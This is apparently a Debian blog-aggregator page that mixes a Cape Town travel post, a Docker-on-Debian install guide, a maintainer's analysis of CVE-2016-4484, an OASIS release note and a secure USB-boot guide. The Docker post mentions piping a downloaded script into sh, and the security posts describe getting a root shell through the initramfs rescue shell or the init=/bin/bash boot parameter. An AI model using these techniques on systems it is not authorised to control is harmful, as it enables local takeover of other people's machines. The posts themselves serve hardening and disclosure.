This is also something which I have not observed in Indian inter-city buses (an axe to break the window in case of accident, and breakable glass which doesn’t hurt anyone, I presume), whether they are State Transport or the high-end Volvos. Either it’s part of South African road regulations or something that Springbok buses do for their customers. All of these queries about the different facets I wanted to ask the bus driver and the attendant/controller, but in the excitement of seeing and recording new things I couldn’t ask😦

In fact one of the more interesting things I looked at, and could have looked at day and night, is the variety of vehicles on display in Cape Town. In hindsight, I should have bought a couple of 128 GB MMC cards for my mobile rather than the 64 GB one. It was just plain inadequate to capture all that was new and interesting.

Auditorium chair truck seen near the Auditorium

This truck I had seen about 100 metres from the Auditorium on Upper Campus. The truck’s design and paint were something I had never seen before. It is/was similar to casket trucks seen in movies but the way it was painted and everything made it special.

What was interesting was to see the gamut of different vehicles. For instance, I saw no bicycles in most places. There were mostly Japanese/Italian bikes and all sorts of trucks. If I had known before, I would definitely have bought an SD card specifically to take snaps of all the different types of trucks, cars etc. that I saw there.

The adage/phrase “I should stop in any one place and the whole world will pass me by” seemed true on quite a few South African roads. While the roads were on par with or a shade better than India’s, many of them were wide roads. Seeing those, I was left imagining how the Autobahn in Germany and other high-speed expressways would look and feel.

India has also been doing that with the Pune-Mumbai Expressway and projects like the Yamuna Expressway and now its extension, the Agra-Lucknow Expressway, but doing this all over India would probably take a decade or more. We have been at it for a decade and a half; NHDP and PMGSY are two projects which are still ongoing to better the roads. We have been having debates as to whether we should have tolls or not, but that is a discussion for some other time.

One of the more interesting sights I saw was the high-arched gothic-styled church from outside. This is near Longstreet as well.

high arch gothic-styled church

I have seen something similar in Goa and Pondicherry, but not such high arches. I did try a couple of times to gain entry, but one time it was closed and the other time some repair/construction work was going on. I would have loved to see it from inside, and hopefully they would have had an organ as well. I could imagine to some extent the sort of music that would have come out.

Now that Goa has come into the conversation, I can’t help but state that seafood enthusiasts/lovers/aficionados, or/and pescatarians, would have a ball of a time in Goa. Goa is on the Konkan coast and while I’m eggie, those who enjoy seafood really have a ball of a time there. Fouthama’s Festival, which happens in February, is particularly attractive as Goan homes are thrown open for people to come and sample their food, exchange recipes and alike. This happens around 2 weeks before the Goan Carnival and is very much a part of the mish-mashed Konkani-Bengali-Parsi-Portuguese culture.

I better stop here about the Goa otherwise I’ll get into reminiscing mode.

To put the story and events back on track from where we left off (no fiction hereon), Nicholas was in constant communication with base, i.e. UCT, as well as with another group who were hiking from UCT to Table Mountain. We waited for the other group to join us till 13:00 hrs. We came to know that they were lost and were trying to come up, and hence would take more time. As Bernelle, who was a local and had two dogs who knew the hills quite well, was with them, it was decided to go ahead without them.

We came down by the same cable-car and then ventured on towards Houtbay. Houtbay has it all: a fisherman’s wharf, actual boats with tough, mean-looking men with tattoos working on them while puffing cigars/pipes, a gaggle of sea-gulls, the whole scene. Sharing a few pictures of the way in-between.

the view en-route to Houtbay

western style car paint and repair shop

Tajmahal Indian Restaurant, Houtbay

I just now had a quick look at the restaurant listing and it seems they had options for veggies too. Unfortunately, the rating leaves a bit to be desired, but then dunno, as Indian flavouring is something that takes time to get used to. Zomato doesn’t give any idea of how long a restaurant has been in business, and it has too few reviews, so it’s not easy to know how the experience would have been.

Chinese noodles and small houses

Notice the pattern, the pattern of small houses I saw all the way till Houtbay and back. I do vaguely remember starting a discussion about it on the bus but don’t really remember it. I have seen (on TV) cities like Miami, Dubai or/and Hong Kong which have big buildings on the beach, but both in Konkan as well as Houtbay there were small buildings. I guess a combination of zoning regulations, a feel of community, and fear of being flooded all play into beaches being the way they are.

Also, this probably is good as less stress on the environment.

Miamiboyz from Wikimedia Commons

The above picture is taken from Wikipedia from the article Miami Beach, Florida for comparison.

Audi rare car to be seen in India

The Audi – a rare car to be seen in India. This car has been associated with Ravi Shastri since he won one in 1985. I was young but still get goosebumps remembering those days.

first-glance-Houtbay-and-pier

First glance of Houtbay beach and pier. Notice how clean and white the beach is.

Wharf-Grill-Restaurant-from-side-and-Hop-on-Hop-off-bus

You can see the Wharf Grill restaurant in the distance (side-view) and the back of the hop-on hop-off bus (a concept which was unknown to me till then). Once I came back and explored on the web, I came to know this concept is prevalent in many touristy places around the world. By sheer happenstance I also captured a beautiful-looking Indian woman 😉.

So many things happening all at once

In Hindi, we would call this picture ‘virodabhas’ or ‘contradiction’. This was in the afternoon, around 1430 hrs. You have the sun, the clouds, the mountains, the x number of boats, the pier, the houses, the cars, the shops. It was all crazy and beautiful at the same time.

The biggest contradiction is seeing the mountain, the beach and the sea in the same picture. It baffled the mind. Konkan is a bit similar in that respect: in some places you have all three things, but that’s a different experience altogether, as ours is a more tropical climate, although it is one of the most romantic places in the rains.

We were supposed to go on a short cruise to the seal/dolphin island, but as we were late (having waited for the other group) we didn’t go, and instead just loitered there.

Fake-real lookout bar-restaurant

IIRC the lookout bar is situated just next to Houtbay Search and Rescue, although I was curious whether the lookout tower was used in cases of disappearances: lost people, boats etc.

Seal in action

Seal jumping over water, what a miracle!

One of the boats on which we possibly could have been on.

It looked like the boat we could have been on. I clicked it as I especially liked the name Calypso (hence the two links). I shared both as the mythology and its interpretation differ a bit between Greek and Hollywood culture 🙂

Debian folks and the area around

You can see a few Debian folks in the foreground, next to the pole, and a bit of the area around.

Alone boy trying to surf

I don’t know anything about water sports, and after some time he came out. I was left wondering, though, how safe he was in that water. While he was close to the pier and just paddling, and there weren’t big waves, I still felt a bit of concern.

Mr. Seal - the actor and his handler

While the act was not at the level we see in the movies, for the time I hung around I saw him showing attitude to his younger audience, eating out of their hands and making funny sounds. Btw, he farted a few times; whether that was a put-on or not I can’t really say, but it produced a few guffaws from his audience.

A family feeding Mr. Seal

I dunno what the birds came down for. Mr. Seal was being fed oily small fish parts; dunno if the oil was secreted by the fish themselves or whatever, it just looked oily from a distance.

Bird-Man-Bird

Bird taking necessary sun bath

typical equipment on a boat to catch fish-lot of nets

boats-nets-and-ropes

People working on disentangling a net

There wasn’t much activity at the time we went. It probably would have been different at sunrise, and would be at sunset. The only activity I saw was on this boat, where they were busy fixing and disentangling the lines. I came up with 5-15 different ideas for a story but rejected them because:

a. Probably all of them have been tried. People have been fishing since the beginning of time, and modern fishing is probably 200-odd years old. I have read accounts of fishing companies from the early 1800s onwards, so probably everything must have been tried.

b. The more dangerous one: if there is a unique idea, then it becomes more dangerous, as writing is an all-consuming process. Writing a blog post (bad or good) takes lots of time. I constantly read, re-read, try and improvise till I’m satisfied or my patience runs out. In a book you simply can’t have such luxuries.

hout-bay-search-and-rescue-no-parking-zone

No parking/tow zone in/near the Houtbay Search and Rescue. Probably to let emergency vehicles out once something untoward happens.

hout-bay-sea-rescue-with-stats

54 lives saved, 154 boats towed – salut, Houtbay Sea Rescue!

The different springbok atlas bus that we were on

kraal-kraft

The only small criticism is for Houtbay: there wasn’t a single public toilet. We had to ask a favor at Kraal Kraft to use their toilets, and there could have been accidents; it wasn’t well lit and water was spilled around.

Road sign telling that we are near to UCT

Because we were late, we missed both the boat cruise and some street shops selling trinkets. Other than that it was all well. We should have stayed till sunset; I am sure the view would have been breath-taking, but we hadn’t booked the bus till the evening.

Back at UCT

Overall it was an interesting day: we had explored part of Table Mountain, seen the somewhat outrageously priced trinkets there, and explored the Houtbay seaside as well.


Filed under: Miscellaneous Tagged: #Audi, #Cape Town, #Cruises, #Debconf16, #French Council, #Geography, #Houtbay Sea Rescue, #Jail, #Middle East, #Springbok Atlas, #Vehicles

07 December, 2016 09:10PM by shirishag75

Tianon Gravi

My Docker Install Process

I’ve had several requests recently for information about how I personally set up a new machine for running Docker (especially since I don’t use the infamous curl get.docker.com | sh), so I figured I’d outline the steps I usually take.

For the purposes of simplicity, I’m going to assume Debian (specifically stretch, the upcoming Debian stable release), but these should generally be easily adjustable to jessie or Ubuntu.

These steps should be fairly similar to what’s found in upstream’s “Install Docker on Debian” document, but do differ slightly in a few minor ways.

grab Docker’s APT repo GPG key

The way I do this is probably a bit unconventional, but the basic gist is something like this:

export GNUPGHOME="$(mktemp -d)"
gpg --keyserver ha.pool.sks-keyservers.net --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
gpg --export --armor 58118E89F3A912897C070ADBF76221572C52609D | sudo tee /etc/apt/trusted.gpg.d/docker.gpg.asc
rm -rf "$GNUPGHOME"

(On jessie or another release whose APT doesn’t support .asc files in /etc/apt/trusted.gpg.d, I’d drop --armor and the .asc and go with simply /.../docker.gpg.)

This creates a new GnuPG directory to work with (so my personal ~/.gnupg doesn’t get cluttered with this new key), downloads Docker’s signing key from the keyserver gossip network (verifying the fetched key via the full fingerprint I’ve provided), exports the key into APT’s keystore, then cleans up the leftovers.

For completeness, other popular ways to fetch this include:

sudo apt-key adv --keyserver ha.pool.sks-keyservers.net --recv-keys 58118E89F3A912897C070ADBF76221572C52609D

(worth noting that man apt-key discourages the use of apt-key adv)

wget -qO- 'https://apt.dockerproject.org/gpg' | sudo apt-key add -

(no verification of the downloaded key)

Here’s the relevant output of apt-key list on a machine where I’ve got this key added in the way I outlined above:

$ apt-key list
...

/etc/apt/trusted.gpg.d/docker.gpg.asc
-------------------------------------
pub   rsa4096 2015-07-14 [SCEA]
      5811 8E89 F3A9 1289 7C07  0ADB F762 2157 2C52 609D
uid           [ unknown] Docker Release Tool (releasedocker) <[email protected]>

...

add Docker’s APT source

If you prefer to fetch sources via HTTPS, install apt-transport-https, but I’m personally fine with simply doing GPG verification of fetched packages, so I forgo that in favor of fewer packages installed. YMMV.

echo 'deb http://apt.dockerproject.org/repo debian-stretch main' | sudo tee /etc/apt/sources.list.d/docker.list

Hopefully it’s obvious, but debian-stretch in that line should be replaced by debian-jessie, ubuntu-xenial, etc. as desired. It’s also worth pointing out that this will not include Docker’s release candidates. If you want those as well, add testing after main, i.e. ... debian-stretch main testing' | ....
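If you'd rather not type the suite by hand, here's a hypothetical helper that builds the same line from a distributor id and codename (on a real machine you'd feed it the output of lsb_release, which requires the lsb-release package — that part is shown only as a comment):

```shell
# Hypothetical helper: build the "deb ..." line for Docker's APT repo from a
# distributor id (e.g. "Debian") and a codename (e.g. "stretch").
docker_apt_line() {
	printf 'deb http://apt.dockerproject.org/repo %s-%s main\n' \
		"$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')" "$2"
}

# On a real machine (needs the lsb-release package):
#   docker_apt_line "$(lsb_release -is)" "$(lsb_release -cs)" \
#       | sudo tee /etc/apt/sources.list.d/docker.list
docker_apt_line Debian stretch
# prints: deb http://apt.dockerproject.org/repo debian-stretch main
```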

At this point, you should be safe to run apt-get update to verify the changes:

$ sudo apt-get update
...
Hit:1 http://apt.dockerproject.org/repo debian-stretch InRelease
...
Reading package lists... Done

(There shouldn’t be any warnings or errors about missing keys, etc.)

configure Docker

This step could be done after Docker is installed (and indeed, that’s usually when I do it, because I forget that I should until I’ve got Docker installed and realize that my configuration is suboptimal), but doing it before ensures that Docker doesn’t have to be restarted later.

sudo mkdir -p /etc/docker
sudo sensible-editor /etc/docker/daemon.json

(sensible-editor can be replaced by whatever editor you prefer, but that command should choose or prompt for a reasonable default)

I then fill daemon.json with at least a default storage-driver. Whether I use aufs or overlay2 depends on my kernel version and available modules – if I’m on Ubuntu, AUFS is still a no-brainer (since it’s included in the default kernel if the linux-image-extra-XXX/linux-image-extra-virtual package is installed), but on Debian AUFS is only available in either 3.x kernels (jessie’s default non-backports kernel) or recently in the aufs-dkms package (as of this writing, still only available on stretch and sid – no jessie-backports option).

If my kernel is 4.x+, I’m likely going to choose overlay2 (or if that errors out, the older overlay driver).

Choosing an appropriate storage driver is a fairly complex topic, and I’d recommend that for serious production deployments, more research on pros and cons is performed than I’m including here (especially since AUFS and OverlayFS are not the only options – they’re just the two I personally use most often).

{
	"storage-driver": "overlay2"
}
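The kernel-version rule of thumb above can be sketched as a tiny helper (purely illustrative, not part of my actual setup; a real deployment should also verify that the chosen module actually loads):

```shell
# Illustrative only: pick overlay2 on 4.x+ kernels, otherwise fall back to
# aufs. Takes a kernel release string such as the output of `uname -r`.
choose_storage_driver() {
	major="${1%%.*}"    # e.g. "4.8.0-1-amd64" -> "4"
	if [ "$major" -ge 4 ]; then
		echo overlay2
	else
		echo aufs
	fi
}

choose_storage_driver "$(uname -r)"
```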

configure boot parameters

I usually set a few boot parameters as well (in /etc/default/grub’s GRUB_CMDLINE_LINUX_DEFAULT option – run sudo update-grub after adding these, space-separated).

  • cgroup_enable=memory – enable “memory accounting” for containers (allows docker run --memory for setting hard memory limits on containers)
  • swapaccount=1 – enable “swap accounting” for containers (allows docker run --memory-swap for setting hard swap memory limits on containers)
  • systemd.legacy_systemd_cgroup_controller=yes – newer versions of systemd may disable the legacy cgroup interfaces Docker currently uses; this instructs systemd to keep those enabled (for more details, see systemd/systemd#4628, opencontainers/runc#1175, docker/docker#28109)
  • vsyscall=emulate – allow older binaries to run (debian:wheezy, etc.; see docker/docker#28705)

All together:

...
GRUB_CMDLINE_LINUX_DEFAULT="cgroup_enable=memory swapaccount=1 systemd.legacy_systemd_cgroup_controller=yes vsyscall=emulate"
...

install Docker!

Finally, the time has come.

$ sudo apt-get install -V docker-engine
...

$ sudo docker version
Client:
 Version:      1.12.3
 API version:  1.24
 Go version:   go1.6.3
 Git commit:   6b644ec
 Built:        Wed Oct 26 21:45:16 2016
 OS/Arch:      linux/amd64

Server:
 Version:      1.12.3
 API version:  1.24
 Go version:   go1.6.3
 Git commit:   6b644ec
 Built:        Wed Oct 26 21:45:16 2016
 OS/Arch:      linux/amd64

$ sudo usermod -aG docker "$(id -un)"

(Reboot or logout/login to update your session to include docker group membership and thus no longer require sudo for using docker commands.)

Hope this is useful to someone! If nothing else, it’ll serve as a concise single-page reference for future-tianon. 😇

07 December, 2016 07:00AM by Tianon Gravi ([email protected])

Jonas Meurer

On CVE-2016-4484, a (security?) bug in the cryptsetup initramfs integration

On November 4, I was made aware of a security vulnerability in the integration of cryptsetup into initramfs. The vulnerability was discovered by security researchers Hector Marco and Ismael Ripoll of CyberSecurity UPV Research Group and got CVE-2016-4484 assigned.

In this post I'll try to reflect a bit on the issue.

What CVE-2016-4484 is all about

Basically, the vulnerability is about two separate but related issues:

1. Initramfs rescue shell considered harmful

The main topic that Hector Marco and Ismael Ripoll address in their publication is that Debian exits into a rescue shell in case of failure during initramfs, and that this can be triggered by entering a wrong password ~93 times in a row.

Indeed, the Debian initramfs implementation as provided by initramfs-tools exits into a rescue shell (usually a busybox shell) after a defined number of failed attempts to make the root filesystem available. The loop in question is in local_device_setup() in the local initramfs script.

In general, this behaviour is considered a feature: if the root device hasn't shown up after 30 rounds, the rescue shell is spawned to provide the local user/admin a way to debug and fix things herself.

Hector Marco and Ismael Ripoll argue that in special environments, e.g. on public computers with password protected BIOS/UEFI and bootloader, this opens an attack vector and needs to be regarded as a security vulnerability:

It is common to assume that once the attacker has physical access to the computer, the game is over. The attackers can do whatever they want. And although this was true 30 years ago, today it is not.

There are many "levels" of physical access. [...]

In order to protect the computer in these scenarios: the BIOS/UEFI has one or two passwords to protect the booting or the configuration menu; the GRUB also has the possibility to use multiple passwords to protect unauthorized operations.

And in the case of an encrypted system, the initrd shall block the maximum number of password trials and prevent the access to the computer in that case.

While Hector and Ismael have a valid point in that the rescue shell might open an additional attack vector in special setups, this is not true for the vast majority of Debian systems out there: in most cases a local attacker can alter the boot order, replace or add boot devices, modify boot options in the (GNU GRUB) bootloader menu or modify/replace arbitrary hardware parts.

The required scenario to make the initramfs rescue shell an additional attack vector is indeed very special: locked down hardware, password protected BIOS and bootloader but still local keyboard (or serial console) access are required at least.

Hector and Ismael argue that the default should be changed for enhanced security:

[...] But then Linux is used in more hostile environments, this helpful (but naive) recovery services shall not be the default option.

For the reasons explained above, I tend to disagree with Hector's and Ismael's opinion here. And after discussing this topic with several people I find my opinion reconfirmed: the Debian Security Team disputes the security impact of the issue and others agree.

But leaving the disputable opinion on a sane default aside, I don't think that the cryptsetup package is the right place to change the default, if at all. If you want added security by a locked down initramfs (i.e. no rescue shell spawned), then at least the bootloader (GNU GRUB) needs to be locked down by default as well.

To make it clear: if one wants to lock down the boot process, bootloader and initramfs should be locked down together. And the right place to do this would be the configurable behaviour of grub-mkconfig. Here, one can set a password for GRUB and the boot parameter 'panic=1' which disables the spawning of a rescue shell in initramfs.

But as mentioned, I don't agree that these would be sane defaults. The vast majority of Debian systems out there don't have any security added by a locked down bootloader and initramfs, and the benefit of a rescue shell for debugging purposes clearly outweighs the minor security impact, in my opinion.

For the few setups which require the added security of a locked down bootloader and initramfs, we already have the relevant options documented in the Securing Debian Manual:

After discussing the topic with the initramfs-tools maintainers today, Guilhem and I (the cryptsetup maintainers) finally decided not to change any defaults and just add a 'sleep 60' after the maximum number of allowed attempts has been reached.

2. tries=n option ignored, local brute-force slightly cheaper

Apart from the issue of a rescue shell being spawned, Hector and Ismael also discovered a programming bug in the cryptsetup initramfs integration. This bug in the cryptroot initramfs local-top script allowed endless retries of passphrase input, ignoring the tries=n option of crypttab (and the default of 3). As a result, theoretically unlimited attempts to unlock encrypted disks were possible when processed during the initramfs stage. The attack vector here is that local brute-force attacks become a bit cheaper: instead of having to reboot after the maximum number of tries is reached, one can simply keep trying passwords.

Even though efficient brute-force attacks are mitigated by the PBKDF2 implementation in cryptsetup, this clearly is a real bug.

The reason for the bug was twofold:

  • First, the condition in setup_mapping() responsible for making the function fail when the maximum amount of allowed attempts is reached, was never met:

    setup_mapping()
    {
      [...]
      # Try to get a satisfactory password $crypttries times
      count=0
      while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do
          export CRYPTTAB_TRIED="$count"
          count=$(( $count + 1 ))
          [...]
      done
      if [ $crypttries -gt 0 ] && [ $count -gt $crypttries ]; then
          message "cryptsetup: maximum number of tries exceeded for $crypttarget"
          return 1
      fi
      [...]
    }

    As one can see, the while loop already stops once $count -lt $crypttries no longer holds, i.e. when $count equals $crypttries. Thus the second condition $count -gt $crypttries is never met. This can easily be fixed by decreasing $count by one in case of a successful unlock attempt, along with changing the second condition to $count -ge $crypttries:

    setup_mapping()
    {
      [...]
      while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do
          [...]
          # decrease $count by 1, apparently last try was successful.
          count=$(( $count - 1 ))
          [...]
      done
      if [ $crypttries -gt 0 ] && [ $count -ge $crypttries ]; then
          [...]
      fi
      [...]
    }
    

    Christian Lamparter already spotted this bug back in October 2011 and provided an (incomplete) patch, but back then I even managed to merge the patch in an improper way, making it even more useless: the patch by Christian forgot to decrease $count by one in case of a successful unlock attempt, resulting in warnings about maximum tries exceeded even for successful attempts in some circumstances. But instead of adding the decrease myself and keeping the (almost correct) condition $count -eq $crypttries for detection of exceeded maximum tries, I changed the condition back to the wrong original $count -gt $crypttries that again was never met. Apparently I didn't test the fix properly back then. I definitely should do better in the future!

  • Second, back in December 2013, I added a cryptroot initramfs local-block script as suggested by Goswin von Brederlow in order to fix bug #678692. The purpose of the cryptroot initramfs local-block script is to invoke the cryptroot initramfs local-top script again and again in a loop. This is required to support complex block device stacks.

    In fact, the countless combinations of stacked block devices are one of the biggest and most inglorious reasons that the cryptsetup initramfs integration scripts became so complex over the years. After all, we need to support setups like rootfs on top of LVM with two separate encrypted PVs, or rootfs on top of LVM on top of dm-crypt on top of MD raid.

    The problem with the local-block script is that exiting the setup_mapping() function merely triggers a new invocation of the very same function.

    The guys who discovered the bug suggested a simple and good solution: when the maximum number of attempts is detected (by the second condition from above), the script sleeps for 60 seconds. This mitigates the brute-force options for local attackers; even rebooting after max attempts would be faster.
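That mitigation can be sketched schematically like this (not the literal patch: the real initramfs script uses its message helper and a fixed 60-second sleep; here the delay is a parameter so the demo finishes quickly):

```shell
# Schematic sketch of the suggested fix: once the maximum number of tries
# is reached, sleep before failing, so brute-forcing in place is no faster
# than rebooting. Delay is a parameter for demo purposes only.
fail_after_max_tries() {
	crypttries="$1"; count="$2"; delay="$3"
	if [ "$crypttries" -gt 0 ] && [ "$count" -ge "$crypttries" ]; then
		echo "cryptsetup: maximum number of tries exceeded" >&2
		sleep "$delay"
		return 1
	fi
	return 0
}

fail_after_max_tries 3 3 1 || echo "unlock failed (after delay)"
```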

About disclosure, wording and clickbaiting

I'm happy that Hector and Ismael brought up the topic and made their argument about the security impacts of an initramfs rescue shell, even though I have to admit that I was rather astonished about the fact that they got a CVE assigned.

Nevertheless I'm very happy that they informed the Security Teams of Debian and Ubuntu prior to publishing their findings, which put me in the loop in turn. Also Hector and Ismael were open and responsive when it came to discussing their proposed fixes.

But unfortunately the way they advertised their finding was not very helpful. They announced a speech about this topic at the DeepSec 2016 in Vienna with the headline Abusing LUKS to Hack the System.

Honestly, this headline is misleading, if not wrong, in several ways:

  • First, the whole issue is not about LUKS, nor is it about cryptsetup itself. It's about Debian's integration of cryptsetup into the initramfs, which is a completely different story.
  • Second, the term hack the system suggests that an exploit to break into the system is revealed. This is not true. The device encryption is not endangered at all.
  • Third, as shown above, very special prerequisites need to be met in order to make the mere existence of a LUKS encrypted device the relevant fact for being able to spawn a rescue shell during initramfs.

Unfortunately, the way this issue was published led to even worse articles in the tech news press. Headlines like Major security hole found in Cryptsetup script for LUKS disk encryption or Linux Flaw allows Root Shell During Boot-Up for LUKS Disk-Encrypted Systems suggest that a major security vulnerability was revealed, one that compromised the protection that cryptsetup and LUKS offer.

If these articles/news did anything at all, then it was causing damage to the cryptsetup project, which is not affected by the whole issue at all.

After the cat was out of the bag, Marco and Ismael agreed that the way the news picked up the issue was suboptimal, but I cannot fight the feeling that the over-exaggeration was partly intended and that clickbaiting is taking place here. That's a bit sad.

07 December, 2016 01:53AM

December 06, 2016

hackergotchi for Sylvain Le Gall

Sylvain Le Gall

Release of OASIS 0.4.8

I am happy to announce the release of OASIS v0.4.8.

Logo OASIS small

OASIS is a tool to help OCaml developers to integrate configure, build and install systems in their projects. It should help to create standard entry points in the source code build system, allowing external tools to analyse projects easily.

This tool is freely inspired by Cabal which is the same kind of tool for Haskell.

You can find the new release here and the changelog here. More information about OASIS in general on the OASIS website.
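For readers unfamiliar with the tool, a minimal hypothetical `_oasis` file might look like this (the project name and paths are invented for illustration; field names follow the OASIS manual):

```
OASISFormat: 0.4
Name:        myproject
Version:     0.1.0
Synopsis:    Example project description
Authors:     Jane Doe
License:     MIT
BuildTools:  ocamlbuild

Executable myproject
  Path:   src
  MainIs: main.ml
```

Running `oasis setup` against such a file then generates the standard build entry points (setup.ml and friends) for the project.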

Pull request for inclusion in OPAM is pending.

Here is a quick summary of the important changes:

  • Fix various parsing problems present in OASIS 0.4.7 (extraneous whitespace, handling of the ocamlbuild argument...)
  • Enable creation of OASIS plugin and OASIS command line plugin.
  • Various fixes for the plugin "omake".
  • Create 2 branches to pin OASIS with OPAM, making it easier for contributors to test the dev version.

Thanks to Edwin Török, Yuri D. Lensky and Gerd Stolpmann for their contributions.

06 December, 2016 11:17PM by gildor

hackergotchi for Mirco Bauer

Mirco Bauer

Secure USB boot with Debian

Foreword

The moment you leave your laptop, say in a hotel room, you can no longer trust your system as it could have been modified while you were away. Think you are safe because you have an encrypted disk? Well, if the boot partition is on the laptop itself, it can be manipulated and you will not notice, because the boot partition can't be encrypted. The BIOS needs to access the MBR and boot loader, and that loads the Linux kernel, all unencrypted. There have been some reports lately that the Linux cryptsetup is insecure because you can spawn a root shell by hitting the enter key for 70 seconds. This is not the real threat to your system, really. If someone has physical access to your hardware, he can get a root shell in less than a second by passing init=/bin/bash as a parameter to the Linux kernel in the boot loader, regardless of whether cryptsetup is used or not! The attacker can also use other ways, like booting a live system from CD/USB etc. The real insecurity here is the unencrypted boot partition, not some script that gets executed from it. So how to prevent this physical access attack vector? Just keep reading this guide.

This guide explains how to install Debian securely on your laptop using an external USB boot disk. The disk inside the laptop should not contain your /boot partition, since that is an easy target for manipulation. An attacker could for example change the boot scripts inside the initrd image to capture the passphrase of your encrypted volume. With a USB boot partition, you can unplug the USB stick after the operating system has booted. Best practice here is to keep the USB stick together with your bunch of keys. That way you will disconnect the USB stick soon after the boot has finished, so you can put it back into your pocket.

Secure Hardware Assumptions

We have to assume here that the hardware you are using to download and verify the install media is safe to use. The same applies to the hardware where you are doing the fresh Debian install. That is, the hardware does not contain any malware in the form of code in EFI or other manipulation attempts that would influence the behavior of the operating system we are going to install.

Download Debian Install ISO

Feel free to use any Debian mirror and install flavor. For this guide I am using the download mirror in Germany and the DVD install flavor.

wget http://ftp.de.debian.org/debian-cd/current/amd64/iso-dvd/debian-8.6.0-amd64-DVD-1.iso

Verify hashsum of ISO file

To know if the ISO file was downloaded without modification, we have to check the hashsum of the file. The hashsum file can be found in the same directory as the ISO file on the download mirror. With hashsums, if a single bit differs in the file, the resulting SHA512 sum will be completely different.

Obtain the hashsum file using:

wget http://ftp.de.debian.org/debian-cd/current/amd64/iso-dvd/SHA512SUMS

Calculate a local hashsum from the downloaded ISO file:

sha512sum debian-8.6.0-amd64-DVD-1.iso

Now you need to compare the hashsum with the one in the SHA512SUMS file. Since the SHA512SUMS file contains the hashsums of all files in the same directory, you need to find the right one first. grep can do this for you:

grep debian-8.6.0-amd64-DVD-1.iso SHA512SUMS

Both commands executed after each other should show the following output:

$ sha512sum debian-8.6.0-amd64-DVD-1.iso
c3883edfc95e3b09152d46ce29a032eed1de71531549aee86bb98dab1528088a16f0b4d628aee8ac6cc420364e208d3d5e19d0dea3576f53b904c18e8f604d8c  debian-8.6.0-amd64-DVD-1.iso
$ grep debian-8.6.0-amd64-DVD-1.iso SHA512SUMS
c3883edfc95e3b09152d46ce29a032eed1de71531549aee86bb98dab1528088a16f0b4d628aee8ac6cc420364e208d3d5e19d0dea3576f53b904c18e8f604d8c  debian-8.6.0-amd64-DVD-1.iso

As you can see the hashsum found in the SHA512SUMS file matches with the locally generated hashsum using the sha512sum command.
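Instead of eyeballing the two sums, you can also let sha512sum do the comparison itself. On the real files that would be `sha512sum -c --ignore-missing SHA512SUMS` (the --ignore-missing flag needs a recent coreutils and skips entries for files you didn't download). A self-contained demo of the mechanism, using a scratch file instead of the ISO:

```shell
# Demo of sha512sum's built-in compare mode with a scratch file: record a
# checksum into a sums file, then verify the file against it.
cd "$(mktemp -d)"
echo 'pretend ISO contents' > demo.iso
sha512sum demo.iso > SHA512SUMS
sha512sum -c SHA512SUMS
# prints: demo.iso: OK
```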

At this point we are not finished yet. These two matching hashsums just mean that whatever was on the download server matches what we have received and stored locally on disk. The ISO file and the SHA512SUMS file could still be modified versions!

And this is where GPG signatures come in, covered in the next section.

Download GPG Signature File

GPG signature files usually have the .sign file name extension but could also be named .asc. Download the signature file using wget:

wget http://ftp.de.debian.org/debian-cd/current/amd64/iso-dvd/SHA512SUMS.sign

Obtain GPG Key of Signer

Letting gpg verify the signature will fail at this point as we don't have the public key of the signer:

$ gpg --verify SHA512SUMS.sign
gpg: assuming signed data in 'SHA512SUMS'
gpg: Signature made Mon 19 Sep 2016 12:23:47 AM HKT
gpg:                using RSA key DA87E80D6294BE9B
gpg: Can't check signature: No public key

Downloading a key is trivial with gpg, but more importantly we need to verify that this key (DA87E80D6294BE9B) is trustworthy, as it could also be a key of the infamous man-in-the-middle.

Here you can find the GPG fingerprints of the official signing keys used by Debian. The ending of the "Key fingerprint" line should match the key id we found in the signature file from above.

gpg:                using RSA key DA87E80D6294BE9B

Key fingerprint = DF9B 9C49 EAA9 2984 3258  9D76 DA87 E80D 6294 BE9B

DA87E80D6294BE9B matches Key fingerprint = DF9B 9C49 EAA9 2984 3258 9D76 DA87 E80D 6294 BE9B
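That comparison can also be scripted: the long key id is simply the last 16 hex digits of the full fingerprint with the spaces removed (values as shown above):

```shell
# The 16-hex-digit long key id is the tail of the 40-hex-digit fingerprint.
fpr='DF9B 9C49 EAA9 2984 3258  9D76 DA87 E80D 6294 BE9B'
keyid='DA87E80D6294BE9B'
tail16="$(printf '%s' "$fpr" | tr -d ' ' | tail -c 16)"
[ "$tail16" = "$keyid" ] && echo 'key id matches fingerprint'
```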

To download and import this key run:

$ gpg --keyserver keyring.debian.org --recv-keys DA87E80D6294BE9B

Verify GPG Signature of Hashsum File

Ok, we are almost there. Now we can run the command which checks if the signature of the hashsum file we have, was not modified by anyone and matches what Debian has generated and signed.

$ gpg --verify SHA512SUMS.sign
gpg: assuming signed data in 'SHA512SUMS'
gpg: Signature made Mon 19 Sep 2016 12:23:47 AM HKT
gpg:                using RSA key DA87E80D6294BE9B
gpg: checking the trustdb
gpg: marginals needed: 3  completes needed: 1  trust model: pgp
gpg: depth: 0  valid:   1  signed:   0  trust: 0-, 0q, 0n, 0m, 0f, 1u
gpg: Good signature from "Debian CD signing key <[email protected]>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: DF9B 9C49 EAA9 2984 3258  9D76 DA87 E80D 6294 BE9B

The important line in this output is the "Good signature from ..." one. It still shows a warning since we never certified (signed) that Debian key. This can be ignored at this point though.

Write ISO Image to Install Media

With a verified pristine ISO file we can finally start the install by writing it to a USB stick or blank DVD. So use your favorite tool to write the ISO to your install media and boot from it. I have used dd with a USB stick attached as /dev/sdb.

dd if=debian-8.6.0-amd64-DVD-1.iso of=/dev/sdb bs=1M oflag=sync

Install Debian on Crypted Volume with USB boot partition

I am not explaining each step of the Debian install here. The Debian handbook is a good resource for covering each install step.

Follow the steps until the installer wants to partition your disk.

There you need to select the "Guided, use entire disk and set up encrypted LVM" option. After that select the built-in disk of your laptop, which usually is sda but double check this before you go ahead, as it will overwrite the data! The 137 GB disk in this case is the built-in disk and the 8 GB is the USB stick.

It makes no difference at this point whether you select "All files in one partition" or "Separate /home partition". The USB boot partition can be selected at a later step.

Confirm that you want to overwrite your built-in disk shown as sda. It will take a while as it will write random data to the disk to ensure there is no unencrypted data left on the disk from previous installations for example.

